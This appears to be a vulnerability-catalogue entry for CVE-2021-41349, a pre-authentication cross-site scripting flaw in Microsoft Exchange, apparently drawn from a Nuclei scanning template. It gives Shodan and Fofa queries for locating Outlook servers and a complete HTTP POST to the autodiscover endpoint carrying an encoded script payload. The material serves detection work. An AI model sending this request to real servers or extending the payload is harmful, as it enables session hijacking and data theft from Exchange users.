| Title | Microsoft Exchange Server Pre-Auth POST Based Cross-Site Scripting |
|---|---|
| Author | rootxharsh,iamnoooob |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, data theft, or other malicious activities. |
| Remediation | Apply the latest security updates provided by Microsoft to mitigate this vulnerability. |
| CVSS Score | 6.5 |
| EPSS Score | 0.91327 |
| CVE ID | CVE-2021-41349 |
| Shodan Query | vuln:cve-2021-26855http.favicon.hash:1768726119http.title:"outlook"cpe:"cpe:2.3:a:microsoft:exchange_server" |
| Fofa Query | title="outlook"icon_hash=1768726119 |
| Tags | cve cve2021 xss microsoft exchange vkev vuln |
Microsoft Exchange Server is vulnerable to a spoofing vulnerability. Be aware this CVE ID is unique from CVE-2021-42305.
POST /autodiscover/autodiscover.json HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (watchTowr; Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Connection: close
Content-Length: 66
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
%3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-41349.yaml
🦈 Packet Capture: ⬇️ Download cve-2021-41349.pcap
N/AN/A